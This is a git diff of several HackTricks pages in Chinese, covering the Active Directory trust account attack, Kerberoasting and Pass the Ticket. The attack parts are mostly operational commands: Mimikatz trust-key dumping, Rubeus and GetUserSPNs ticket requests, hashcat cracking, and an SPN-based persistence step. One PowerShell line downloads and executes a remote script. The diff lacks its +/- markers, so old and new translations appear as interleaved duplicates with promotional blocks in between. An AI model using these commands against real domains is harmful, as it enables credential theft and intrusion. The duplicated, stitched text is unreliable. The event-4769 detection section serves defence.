<figure><img src="../../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
\
使用 [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=dcsync) 可以轻松构建和 **自动化** 工作流程,使用世界上 **最先进** 的社区工具。\
立即获取访问权限:
Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=dcsync) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=dcsync" %}

View file

@ -1,20 +1,21 @@
# 外部森林域 - 单向(出站)
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}
这种情况下,**您的域**正在将一些**特权**委托给来自**不同域**的主体
此场景中 **您的域** 正在 **信任** 来自 **不同域** 的某些 **权限**
## 枚举
@ -40,58 +41,59 @@ MemberName : S-1-5-21-1028541967-2937615241-1935644758-1115
MemberDistinguishedName : CN=S-1-5-21-1028541967-2937615241-1935644758-1115,CN=ForeignSecurityPrincipals,DC=DOMAIN,DC=LOCAL
## Note how the members aren't from the current domain (ConvertFrom-SID won't work)
```
## 信任账户攻击
## Trust Account Attack
两个域之间建立信任关系时,即域 **A** 和域 **B** 之间建立信任关系时存在安全漏洞,其中域 **B** 将其信任扩展到域 **A**。在这种设置中,在域 **A** 中为域 **B** 创建了一个特殊账户,该账户在两个域之间的身份验证过程中起着至关重要的作用。与域 **B** 关联的这个账户用于加密跨域访问服务的票证。
在两个域之间建立信任关系时,存在安全漏洞,这里将其称为域 **A** 和域 **B**,其中域 **B** 将其信任扩展到域 **A**。在此设置中,在域 **A** 中为域 **B** 创建了一个特殊帐户,该帐户在两个域之间的身份验证过程中发挥着关键作用。与域 **B** 关联的此帐户用于加密跨域访问服务的票证。
在这里需要理解的关键方面是,可以使用命令行工具从域 **A** 中的域控制器中提取此特殊账户的密码和哈希值。执行此操作的命令为
这里需要理解的关键点是,可以使用命令行工具从域 **A** 的域控制器中提取此特殊帐户的密码和哈希。执行此操作的命令是
```powershell
Invoke-Mimikatz -Command '"lsadump::trust /patch"' -ComputerName dc.my.domain.local
```
这种提取是可能的,因为带有名称后面的 **$** 的帐户是活动的,并且属于域 **A** 的 "Domain Users" 组,从而继承与该组关联的权限。这允许个人使用该帐户的凭据对域 **A** 进行身份验证。
此提取之所以可能,是因为该账户名称后带有 **$**,处于活动状态,并且属于域 **A** 的“域用户”组,从而继承了与该组相关的权限。这使得个人可以使用该账户的凭据对域 **A** 进行身份验证。
**警告:** 可以利用这种情况在域 **A** 中作为用户获得立足点,尽管权限有限。但是,这种访问权限足以在域 **A** 上执行枚举。
**警告:** 利用这种情况以用户身份在域 **A** 中获得立足点是可行的,尽管权限有限。然而,这种访问足以对域 **A**行枚举。
`ext.local`是信任域,`root.local`是受信任域的情况下,将在`root.local`中创建一个名为`EXT$`的用户帐户。通过特定工具可以转储Kerberos信任密钥揭示`root.local`中`EXT$`的凭据。实现此目的的命令是:
`ext.local` 是信任域而 `root.local` 是被信任域的场景中,将在 `root.local` 中创建一个名为 `EXT$` 的用户账户。通过特定工具,可以转储 Kerberos 信任密钥,从而揭示 `root.local``EXT$` 的凭据。实现此目的的命令是:
```bash
lsadump::trust /patch
```
接下来可以使用提取的RC4密钥通过另一个工具命令进行身份验证身份验证为`root.local\EXT$`,在`root.local`中。
在此之后,可以使用提取的 RC4 密钥通过另一个工具命令以 `root.local\EXT$` 身份在 `root.local` 中进行身份验证:
```bash
.\Rubeus.exe asktgt /user:EXT$ /domain:root.local /rc4:<RC4> /dc:dc.root.local /ptt
```
这个认证步骤打开了在 `root.local` 内枚举甚至利用服务的可能性,比如执行 Kerberoast 攻击来提取服务账户凭据
此身份验证步骤打开了枚举甚至利用 `root.local` 中服务的可能性,例如执行 Kerberoast 攻击以提取服务帐户凭据,使用
```bash
.\Rubeus.exe kerberoast /user:svc_sql /domain:root.local /dc:dc.root.local
```
### 获取明文信任密码
### 收集明文信任密码
前的流程中,使用了信任哈希而不是**明文密码**(也被**mimikatz转储**)。
前的流程中,使用了信任哈希而不是**明文密码**该密码也被**mimikatz**提取)。
可以通过将mimikatz的\[ CLEAR ]输出从十六进制转换并移除空字节‘\x00来获取明文密码
明文密码可以通过将mimikatz的\[ CLEAR ]输出从十六进制转换并去除空字节‘\x00来获得
![](<../../.gitbook/assets/image (938).png>)
有时在创建信任关系时,用户必须输入信任的密码。在这个演示中,关键是原始的信任密码,因此是可读的。随着密钥的循环30天明文将不再是可读的但在技术上仍然可用。
有时在创建信任关系时,用户必须输入信任的密码。在这个演示中,密钥是原始信任密码,因此是人类可读的。随着密钥的循环30天明文将不再是人类可读的,但在技术上仍然可以使用。
明文密码可用于以信任帐户的身份执行常规身份验证这是使用信任帐户的Kerberos密钥请求TGT的替代方法。在这里从ext.local查询root.local的Domain Admins成员
明文密码可以用作信任账户进行常规身份验证作为使用信任账户的Kerberos密钥请求TGT的替代方案。在这里从ext.local查询root.local的Domain Admins成员
![](<../../.gitbook/assets/image (792).png>)
## 参考
## 参考文献
* [https://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-7-trust-account-attack-from-trusting-to-trusted](https://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-7-trust-account-attack-from-trusting-to-trusted)
{% hint style="success" %}
学习与实践AWS黑客技术<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践GCP黑客技术<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
<summary>支持HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**上关注**我们。
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f)或[**Telegram群组**](https://t.me/peass)或**在** **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**上关注我们。**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub库提交PR分享黑客技巧。
</details>
{% endhint %}

View file

@ -3,43 +3,44 @@
<figure><img src="../../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
\
使用 [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=kerberoast) 来轻松构建和**自动化工作流程**,使用世界上**最先进**的社区工具。\
使用 [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=kerberoast) 轻松构建和 **自动化工作流程**,由世界上 **最先进** 的社区工具提供支持。\
立即获取访问权限:
{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=kerberoast" %}
{% hint style="success" %}
学习和实践 AWS 渗透测试:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 渗透测试: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持 HackTricks 的其他方式:
* 如果您想看到您的**公司在 HackTricks 中做广告**或**下载 PDF 版本的 HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 探索[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家 [**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)** 上关注我们**。
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来**分享您的黑客技巧**。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **在 Twitter 上关注** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}
## Kerberoast
Kerberoast 专注于获取与**Active Directory (AD)** 中以**用户帐户**运行的服务相关的**TGS 票证**。这些票证的加密使用源自**用户密码**的密钥,从而可能导致**离线凭据破解**。将用户帐户用作服务的情况由非空的**"ServicePrincipalName"**属性表示
Kerberoasting 关注于获取 **TGS 票证**,特别是与 **Active Directory (AD)****用户账户** 相关的服务,排除 **计算机账户**。这些票证的加密使用源自 **用户密码** 的密钥,从而允许 **离线凭证破解** 的可能性。使用用户账户作为服务的标志是 **"ServicePrincipalName"** 属性非空
要执行**Kerberoast**,需要一个能够请求**TGS 票证**的域帐户;然而,此过程不需要**特殊权限**,因此任何具有**有效域凭据**的人都可以访问。
执行 **Kerberoasting** 需要一个能够请求 **TGS 票证** 的域账户;然而,这一过程并不需要 **特殊权限**,使得任何拥有 **有效域凭证** 的人都可以访问。
### 关键点:
### 关键点:
* **Kerberoast** 针对**AD** 中的**用户帐户服务**的**TGS 票证**
* 使用**用户密码**生成的密钥加密的票证可以**离线破解**
* 通过非空的**ServicePrincipalName**标识服务
* 不需要**特殊权限**,只需**有效的域凭据**
* **Kerberoasting** 以 **AD** 中的 **用户账户服务** 为目标 **TGS 票证**
* 使用 **用户密码** 密钥加密的票证可以 **离线破解**
* 服务通过 **ServicePrincipalName** 的非空值来识别
* **不需要特殊权限**,只需 **有效域凭证**
### **攻击**
{% hint style="warning" %}
**Kerberoasting 工具**通常在执行攻击并发起 TGS-REQ 请求时请求**`RC4 加密`**。这是因为**RC4**比其他加密算法如 AES-128 和 AES-256 更容易离线破解,可使用 Hashcat 等工具。\
RC4类型 23哈希以**`$krb5tgs$23$*`**开头,而 AES-256类型 18以**`$krb5tgs$18$*`**开头。
**Kerberoasting 工具** 通常在执行攻击和发起 TGS-REQ 请求时请求 **`RC4 加密`**。这是因为 **RC4 是** [**较弱的**](https://www.stigviewer.com/stig/windows\_10/2017-04-28/finding/V-63795),并且比其他加密算法(如 AES-128 和 AES-256更容易使用 Hashcat 等工具进行离线破解。\
RC4类型 23哈希以 **`$krb5tgs$23$*`** 开头,而 AES-256类型 18 **`$krb5tgs$18$*`** 开头。`
{% endhint %}
#### **Linux**
@ -53,21 +54,21 @@ GetUserSPNs.py -request -dc-ip <DC_IP> -hashes <LMHASH>:<NTHASH> <DOMAIN>/<USERN
kerberoast ldap spn 'ldap+ntlm-password://<DOMAIN.FULL>\<USERNAME>:<PASSWORD>@<DC_IP>' -o kerberoastable # 1. Enumerate kerberoastable users
kerberoast spnroast 'kerberos+password://<DOMAIN.FULL>\<USERNAME>:<PASSWORD>@<DC_IP>' -t kerberoastable_spn_users.txt -o kerberoast.hashes # 2. Dump hashes
```
多功能工具,包括一个可用于 Kerberoast 的用户转储:
多功能工具,包括可进行kerberoast的用户转储:
```bash
# ADenum: https://github.com/SecuProject/ADenum
adenum -d <DOMAIN.FULL> -ip <DC_IP> -u <USERNAME> -p <PASSWORD> -c
```
#### Windows
* **枚举可Kerberoast 的用户**
* **枚举可Kerberoast的用户**
```powershell
# Get Kerberoastable users
setspn.exe -Q */* #This is a built-in binary. Focus on user accounts
Get-NetUser -SPN | select serviceprincipalname #Powerview
.\Rubeus.exe kerberoast /stats
```
* **技术 1: 请求TGS并从内存中转储**
* **技术 1:请求 TGS 并从内存中转储**
```powershell
#Get TGS in memory from a single user
Add-Type -AssemblyName System.IdentityModel
@ -87,7 +88,7 @@ python2.7 kirbi2john.py sqldev.kirbi
# Transform john to hashcat
sed 's/\$krb5tgs\$\(.*\):\(.*\)/\$krb5tgs\$23\$\*\1\*\$\2/' crack_file > sqldev_tgs_hashcat
```
* **技术 2: 自动工具**
* **技术 2:自动化工具**
```bash
# Powerview: Get Kerberoast hash of a user
Request-SPNTicket -SPN "<SPN>" -Format Hashcat #Using PowerView Ex: MSSQLSvc/mgmt.domain.local
@ -104,13 +105,13 @@ iex (new-object Net.WebClient).DownloadString("https://raw.githubusercontent.com
Invoke-Kerberoast -OutputFormat hashcat | % { $_.Hash } | Out-File -Encoding ASCII hashes.kerberoast
```
{% hint style="warning" %}
当请求TGS时Windows事件`4769 - 请求了一个Kerberos服务票证`会被生成。
当请求 TGS 时Windows 事件 `4769 - A Kerberos service ticket was requested` 被生成。
{% endhint %}
<figure><img src="../../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
\
使用[**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=kerberoast)来轻松构建和**自动化工作流程**,利用世界上**最先进**的社区工具。\
使用 [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=kerberoast) 轻松构建和 **自动化工作流程**,由世界上 **最先进** 的社区工具提供支持。\
立即获取访问权限:
{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=kerberoast" %}
@ -123,44 +124,44 @@ hashcat -m 13100 --force -a 0 hashes.kerberoast passwords_kerb.txt
```
### 持久性
如果您对用户拥有足够的**权限**,您可以使其**kerberoastable**
如果你对一个用户拥有**足够的权限**,你可以**使其可进行kerberoast**
```bash
Set-DomainObject -Identity <username> -Set @{serviceprincipalname='just/whateverUn1Que'} -verbose
```
您可以在这里找到用于**kerberoast**攻击的有用**工具**[https://github.com/nidem/kerberoast](https://github.com/nidem/kerberoast)
您可以在这里找到用于 **kerberoast** 攻击的有用 **工具**: [https://github.com/nidem/kerberoast](https://github.com/nidem/kerberoast)
如果您在Linux上遇到此**错误****`Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)`**,这是由于您的本地时间,您需要将主机与DC同步。有几种选项:
如果您在 Linux 中发现此 **错误**: **`Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)`**,这可能是由于您的本地时间,您需要将主机与 DC 同步。有几个选项:
* `ntpdate <DC的IP>` - 自Ubuntu 16.04起已弃用
* `rdate -n <DC的IP>`
* `ntpdate <IP of DC>` - 自 Ubuntu 16.04 起已弃用
* `rdate -n <IP of DC>`
### 缓解
### 缓解措施
如果可以利用Kerberoasting可以以高度隐蔽性进行。为了检测此活动应注意**安全事件ID 4769**该事件表明已请求Kerberos票证。但是,由于此事件的高频率,必须应用特定过滤器以隔离可疑活动:
如果可利用Kerberoasting 可以以高度隐蔽的方式进行。为了检测此活动,应关注 **安全事件 ID 4769**,该事件表示请求了 Kerberos 票证。然而,由于此事件的高频率,必须应用特定过滤器以隔离可疑活动:
* 服务名称不应为**krbtgt**,因为这是正常请求。
* 应排除以**$**结尾的服务名称,以避免包括用于服务的机器帐户。
* 应通过排除格式为**machine@domain**的帐户名称来过滤来自机器的请求。
* 只应考虑成功的票证请求,由**'0x0'**的失败代码标识
* **最重要的是**,票证加密类型应为**0x17**这在Kerberoasting攻击中经常使用。
* 服务名称不应为 **krbtgt**,因为这是正常请求。
* 以 **$** 结尾的服务名称应被排除,以避免包括用于服务的机器帐户。
* 应通过排除格式为 **machine@domain** 的帐户名称来过滤来自机器的请求。
* 仅应考虑成功的票证请求,通过失败代码 **'0x0'** 识别
* **最重要的是**,票证加密类型应为 **0x17**,这通常 Kerberoasting 攻击中使用。
```bash
Get-WinEvent -FilterHashtable @{Logname='Security';ID=4769} -MaxEvents 1000 | ?{$_.Message.split("`n")[8] -ne 'krbtgt' -and $_.Message.split("`n")[8] -ne '*$' -and $_.Message.split("`n")[3] -notlike '*$@*' -and $_.Message.split("`n")[18] -like '*0x0*' -and $_.Message.split("`n")[17] -like "*0x17*"} | select ExpandProperty message
```
为了减轻Kerberoasting的风险
为了降低Kerberoasting的风险
- 确保**服务账户密码难以猜测**,建议长度超过**25个字符**。
- 使用**托管服务账户**,提供诸如**自动更改密码**和**委派服务主体名称SPN管理**等好处,增强对此类攻击的安全性。
* 确保**服务账户密码难以猜测**,建议长度超过**25个字符**。
* 利用**托管服务账户**,提供如**自动密码更改**和**委派服务主体名称SPN管理**等好处,增强对这种攻击的安全性。
通过实施这些措施组织可以显著降低与Kerberoasting相关的风险。
## 不使用域账户的Kerberoast
## Kerberoast w/o domain account
在**2022年9月**一位名为Charlie Clark的研究人员通过他的平台[exploit.ph](https://exploit.ph/)分享了一种利用系统的新方法。该方法允许通过**KRB\_AS\_REQ**请求获取**服务票证ST**这一方法不需要控制任何Active Directory账户。基本上如果一个主体被设置成不需要预身份验证类似于网络安全领域中已知的**AS-REP Roasting攻击**,则可以利用这一特性来操纵请求过程。具体来说,通过修改请求主体中的**sname**属性,系统会被欺骗以发出**ST**而不是标准的加密票据授予票证TGT
在**2022年9月**一位名为Charlie Clark的研究人员揭示了一种新的系统利用方式,通过他的平台[exploit.ph](https://exploit.ph/)分享。这种方法允许通过**KRB\_AS\_REQ**请求获取**服务票据ST**而令人惊讶的是这并不需要对任何Active Directory账户的控制。基本上如果一个主体的设置不需要预身份验证——这种情况类似于网络安全领域所称的**AS-REP Roasting攻击**——则可以利用这一特性来操纵请求过程。具体而言,通过更改请求主体中的**sname**属性,系统被欺骗发出**ST**而不是标准的加密票据授予票据TGT
该技术在这篇文章中得到了全面解释:[Semperis博客文章](https://www.semperis.com/blog/new-attack-paths-as-requested-sts/)。
该技术在这篇文章中有详细解释:[Semperis博客文章](https://www.semperis.com/blog/new-attack-paths-as-requested-sts/)。
{% hint style="warning" %}
您必须提供用户列表因为我们没有有效账户来使用此技术查询LDAP。
您必须提供用户列表,因为我们没有有效账户来使用此技术查询LDAP。
{% endhint %}
#### Linux
@ -175,30 +176,31 @@ GetUserSPNs.py -no-preauth "NO_PREAUTH_USER" -usersfile "LIST_USERS" -dc-host "d
```bash
Rubeus.exe kerberoast /outfile:kerberoastables.txt /domain:"domain.local" /dc:"dc.domain.local" /nopreauth:"NO_PREAUTH_USER" /spn:"TARGET_SERVICE"
```
## 参考资料
## References
* [https://www.tarlogic.com/blog/how-to-attack-kerberos/](https://www.tarlogic.com/blog/how-to-attack-kerberos/)
* [https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/t1208-kerberoasting](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/t1208-kerberoasting)
* [https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberoasting-requesting-rc4-encrypted-tgs-when-aes-is-enabled](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberoasting-requesting-rc4-encrypted-tgs-when-aes-is-enabled)
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS Family**](https://opensea.io/collection/the-peass-family),我们的独家[NFTs](https://opensea.io/collection/the-peass-family)系列
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**上关注**我们。
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **在** **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** 上关注我们。**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}
<figure><img src="../../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
\
使用[**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=kerberoast)轻松构建和**自动化工作流程**,由全球**最先进**的社区工具驱动。\
立即获取访问权限:
使用 [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=kerberoast) 轻松构建和 **自动化工作流程**,由世界上 **最先进** 的社区工具提供支持。\
今天就获取访问权限:
{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=kerberoast" %}

View file

@ -1,39 +1,40 @@
# 传递票据
# Pass the Ticket
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **在** **Twitter** 🐦 **上关注我们** [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}
<figure><img src="../../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
\
使用[**Trickest**](https://trickest.com/?utm\_source=hacktricks\&utm\_medium=text\&utm\_campaign=ppc\&utm\_term=trickest\&utm\_content=pass-the-ticket)可以轻松构建和**自动化工作流程**,使用世界上**最先进**的社区工具。\
立即获取访问权限:
使用 [**Trickest**](https://trickest.com/?utm\_source=hacktricks\&utm\_medium=text\&utm\_campaign=ppc\&utm\_term=trickest\&utm\_content=pass-the-ticket) 轻松构建和 **自动化工作流程**,由世界上 **最先进** 的社区工具提供支持。\
今天就获取访问权限:
{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=pass-the-ticket" %}
## 传递票据PTT
## Pass The Ticket (PTT)
**传递票据PTT**攻击方法中,攻击者**窃取用户的身份验证票据**,而不是其密码或哈希值。然后使用这个被窃取的票据**冒充用户**,获取对网络中资源和服务的未经授权访问。
**Pass The Ticket (PTT)** 攻击方法中,攻击者 **窃取用户的认证票据**,而不是他们的密码或哈希值。然后使用这个被窃取的票据来 **冒充用户**,获得对网络中资源和服务的未经授权访问。
**阅读**
* [Windows中收集票据](../../network-services-pentesting/pentesting-kerberos-88/harvesting-tickets-from-windows.md)
* [Linux中收集票据](../../network-services-pentesting/pentesting-kerberos-88/harvesting-tickets-from-linux.md)
* [ Windows 收集票据](../../network-services-pentesting/pentesting-kerberos-88/harvesting-tickets-from-windows.md)
* [ Linux 收集票据](../../network-services-pentesting/pentesting-kerberos-88/harvesting-tickets-from-linux.md)
### **在平台之间交换Linux和Windows票据**
### **在平台之间交换 Linux Windows 票据**
[**ticket\_converter**](https://github.com/Zer1t0/ticket\_converter)工具使用票据本身和输出文件来转换票据格式。
[**ticket\_converter**](https://github.com/Zer1t0/ticket\_converter) 工具使用票据本身和输出文件来转换票据格式。
```bash
python ticket_converter.py velociraptor.ccache velociraptor.kirbi
Converting ccache => kirbi
@ -41,10 +42,10 @@ Converting ccache => kirbi
python ticket_converter.py velociraptor.kirbi velociraptor.ccache
Converting kirbi => ccache
```
### 传递票据攻击
在Windows中可以使用[Kekeo](https://github.com/gentilkiwi/kekeo)。
### Pass The Ticket 攻击
{% code title="Linux" %}
```bash
export KRB5CCNAME=/root/impacket-examples/krb5cc_1120601113_ZFxZpK
@ -62,28 +63,29 @@ klist #List tickets in cache to cehck that mimikatz has loaded the ticket
```
{% endcode %}
## 参考资料
## 参考文献
* [https://www.tarlogic.com/blog/how-to-attack-kerberos/](https://www.tarlogic.com/blog/how-to-attack-kerberos/)
<figure><img src="../../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
\
